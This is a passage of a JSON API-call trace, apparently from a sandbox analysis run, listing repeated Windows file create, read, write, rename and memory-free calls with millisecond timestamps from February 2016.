"filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,111", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,121", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,151", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,161", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,171", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,181", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,191", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,201", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,201", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,211", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,221", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,231", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,242", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,252", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,262", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,272", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,292", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,292", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,312", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,312", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,322", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,332", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,342", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,362", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,382", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,382", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,392", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,402", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,412", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,422", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,442", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,462", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,482", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,482", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,502", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,512", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": 